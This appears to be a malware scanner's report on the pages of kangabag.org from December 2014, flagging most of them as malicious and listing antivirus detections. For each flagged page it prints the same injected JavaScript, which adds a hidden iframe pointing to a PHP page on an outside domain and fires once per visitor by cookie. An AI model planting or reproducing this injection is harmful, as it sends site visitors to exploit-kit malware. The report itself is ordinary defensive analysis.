Request | Server response | Status |
http://www.kangabag.org/ | HTTP/1.1 302 Found Connection: close Date: Thu, 25 Dec 2014 11:23:05 GMT Location: http://www.kangabag.org/403.html Server: Apache Content-Length: 216 Content-Type: text/html; charset=iso-8859-1
| clean |
http://www.kangabag.org/403.html | 200 OK Content-Length: 10576 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var kvxf = document.createElement('iframe'); kvxf.src = 'http://www.larosadeiventi-bb.it/mLwKQtJF.php'; kvxf.style.position = 'absolute'; kvxf.style.border = '0'; kvxf.style.height = '9px'; kvxf.style.width = '7px'; kvxf.style.left = '1px'; kvxf.style.top = '1px'; if (!document.getElementById('kvxf')) { document.write('<div id=\'kvxf\'></div>'); document.getElementById('kvxf').appendChild(kvxf); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today =
... 273 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-AHU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Antiy-AVL
- Trojan/Script.AGeneric
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Iframe.gen.u
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.u
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.kangabag.org/index.html | HTTP/1.1 302 Found Connection: close Date: Thu, 25 Dec 2014 11:23:06 GMT Location: http://www.kangabag.org/403.html Server: Apache Content-Length: 216 Content-Type: text/html; charset=iso-8859-1
| clean |
http://www.kangabag.org/test404page.js | HTTP/1.1 302 Found Connection: close Date: Thu, 25 Dec 2014 11:23:06 GMT Location: http://www.kangabag.org/404.html Server: Apache Content-Length: 216 Content-Type: text/html; charset=iso-8859-1
| clean |
http://www.kangabag.org/404.html | 200 OK Content-Length: 9778 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var kvxf = document.createElement('iframe'); kvxf.src = 'http://www.larosadeiventi-bb.it/mLwKQtJF.php'; kvxf.style.position = 'absolute'; kvxf.style.border = '0'; kvxf.style.height = '9px'; kvxf.style.width = '7px'; kvxf.style.left = '1px'; kvxf.style.top = '1px'; if (!document.getElementById('kvxf')) { document.write('<div id=\'kvxf\'></div>'); document.getElementById('kvxf').appendChild(kvxf); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today =
... 273 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-AHU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Antiy-AVL
- Trojan/Script.AGeneric
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Iframe.gen.u
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.u
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.kangabag.org/collection.html | 200 OK Content-Length: 12645 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var kvxf = document.createElement('iframe'); kvxf.src = 'http://www.larosadeiventi-bb.it/mLwKQtJF.php'; kvxf.style.position = 'absolute'; kvxf.style.border = '0'; kvxf.style.height = '9px'; kvxf.style.width = '7px'; kvxf.style.left = '1px'; kvxf.style.top = '1px'; if (!document.getElementById('kvxf')) { document.write('<div id=\'kvxf\'></div>'); document.getElementById('kvxf').appendChild(kvxf); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today =
... 273 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-AHU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Antiy-AVL
- Trojan/Script.AGeneric
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Iframe.gen.u
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.u
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.kangabag.org/bagbread.html | 200 OK Content-Length: 3979 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var kvxf = document.createElement('iframe'); kvxf.src = 'http://www.larosadeiventi-bb.it/mLwKQtJF.php'; kvxf.style.position = 'absolute'; kvxf.style.border = '0'; kvxf.style.height = '9px'; kvxf.style.width = '7px'; kvxf.style.left = '1px'; kvxf.style.top = '1px'; if (!document.getElementById('kvxf')) { document.write('<div id=\'kvxf\'></div>'); document.getElementById('kvxf').appendChild(kvxf); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today =
... 273 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-AHU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Antiy-AVL
- Trojan/Script.AGeneric
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Iframe.gen.u
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.u
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.kangabag.org/carrots.html | 200 OK Content-Length: 3900 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var kvxf = document.createElement('iframe'); kvxf.src = 'http://www.larosadeiventi-bb.it/mLwKQtJF.php'; kvxf.style.position = 'absolute'; kvxf.style.border = '0'; kvxf.style.height = '9px'; kvxf.style.width = '7px'; kvxf.style.left = '1px'; kvxf.style.top = '1px'; if (!document.getElementById('kvxf')) { document.write('<div id=\'kvxf\'></div>'); document.getElementById('kvxf').appendChild(kvxf); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today =
... 273 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-AHU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Antiy-AVL
- Trojan/Script.AGeneric
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Iframe.gen.u
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.u
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.kangabag.org/cutbag.html | 200 OK Content-Length: 3714 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var kvxf = document.createElement('iframe'); kvxf.src = 'http://www.larosadeiventi-bb.it/mLwKQtJF.php'; kvxf.style.position = 'absolute'; kvxf.style.border = '0'; kvxf.style.height = '9px'; kvxf.style.width = '7px'; kvxf.style.left = '1px'; kvxf.style.top = '1px'; if (!document.getElementById('kvxf')) { document.write('<div id=\'kvxf\'></div>'); document.getElementById('kvxf').appendChild(kvxf); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today =
... 273 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-AHU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Antiy-AVL
- Trojan/Script.AGeneric
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Iframe.gen.u
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.u
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.kangabag.org/newspaper.html | 200 OK Content-Length: 3762 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var kvxf = document.createElement('iframe'); kvxf.src = 'http://www.larosadeiventi-bb.it/mLwKQtJF.php'; kvxf.style.position = 'absolute'; kvxf.style.border = '0'; kvxf.style.height = '9px'; kvxf.style.width = '7px'; kvxf.style.left = '1px'; kvxf.style.top = '1px'; if (!document.getElementById('kvxf')) { document.write('<div id=\'kvxf\'></div>'); document.getElementById('kvxf').appendChild(kvxf); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today =
... 273 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-AHU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Antiy-AVL
- Trojan/Script.AGeneric
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Iframe.gen.u
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.u
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.kangabag.org/pinapple.html | 200 OK Content-Length: 3782 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var kvxf = document.createElement('iframe'); kvxf.src = 'http://www.larosadeiventi-bb.it/mLwKQtJF.php'; kvxf.style.position = 'absolute'; kvxf.style.border = '0'; kvxf.style.height = '9px'; kvxf.style.width = '7px'; kvxf.style.left = '1px'; kvxf.style.top = '1px'; if (!document.getElementById('kvxf')) { document.write('<div id=\'kvxf\'></div>'); document.getElementById('kvxf').appendChild(kvxf); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today =
... 273 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-AHU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Antiy-AVL
- Trojan/Script.AGeneric
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Iframe.gen.u
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.u
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.kangabag.org/pouch.html | 200 OK Content-Length: 3788 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var kvxf = document.createElement('iframe'); kvxf.src = 'http://www.larosadeiventi-bb.it/mLwKQtJF.php'; kvxf.style.position = 'absolute'; kvxf.style.border = '0'; kvxf.style.height = '9px'; kvxf.style.width = '7px'; kvxf.style.left = '1px'; kvxf.style.top = '1px'; if (!document.getElementById('kvxf')) { document.write('<div id=\'kvxf\'></div>'); document.getElementById('kvxf').appendChild(kvxf); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today =
... 273 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-AHU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Antiy-AVL
- Trojan/Script.AGeneric
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Iframe.gen.u
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.u
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.kangabag.org/tomatoes.html | 200 OK Content-Length: 3419 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var kvxf = document.createElement('iframe'); kvxf.src = 'http://www.larosadeiventi-bb.it/mLwKQtJF.php'; kvxf.style.position = 'absolute'; kvxf.style.border = '0'; kvxf.style.height = '9px'; kvxf.style.width = '7px'; kvxf.style.left = '1px'; kvxf.style.top = '1px'; if (!document.getElementById('kvxf')) { document.write('<div id=\'kvxf\'></div>'); document.getElementById('kvxf').appendChild(kvxf); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today =
... 273 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-AHU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Antiy-AVL
- Trojan/Script.AGeneric
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Iframe.gen.u
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.u
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.kangabag.org/tulips.html | 200 OK Content-Length: 3708 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var kvxf = document.createElement('iframe'); kvxf.src = 'http://www.larosadeiventi-bb.it/mLwKQtJF.php'; kvxf.style.position = 'absolute'; kvxf.style.border = '0'; kvxf.style.height = '9px'; kvxf.style.width = '7px'; kvxf.style.left = '1px'; kvxf.style.top = '1px'; if (!document.getElementById('kvxf')) { document.write('<div id=\'kvxf\'></div>'); document.getElementById('kvxf').appendChild(kvxf); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today =
... 273 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-AHU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Antiy-AVL
- Trojan/Script.AGeneric
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Iframe.gen.u
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.u
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.kangabag.org/double.html | 200 OK Content-Length: 3541 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var kvxf = document.createElement('iframe'); kvxf.src = 'http://www.larosadeiventi-bb.it/mLwKQtJF.php'; kvxf.style.position = 'absolute'; kvxf.style.border = '0'; kvxf.style.height = '9px'; kvxf.style.width = '7px'; kvxf.style.left = '1px'; kvxf.style.top = '1px'; if (!document.getElementById('kvxf')) { document.write('<div id=\'kvxf\'></div>'); document.getElementById('kvxf').appendChild(kvxf); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today =
... 273 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-AHU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Antiy-AVL
- Trojan/Script.AGeneric
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Iframe.gen.u
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.u
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.kangabag.org/group.html | 200 OK Content-Length: 3749 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var kvxf = document.createElement('iframe'); kvxf.src = 'http://www.larosadeiventi-bb.it/mLwKQtJF.php'; kvxf.style.position = 'absolute'; kvxf.style.border = '0'; kvxf.style.height = '9px'; kvxf.style.width = '7px'; kvxf.style.left = '1px'; kvxf.style.top = '1px'; if (!document.getElementById('kvxf')) { document.write('<div id=\'kvxf\'></div>'); document.getElementById('kvxf').appendChild(kvxf); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today =
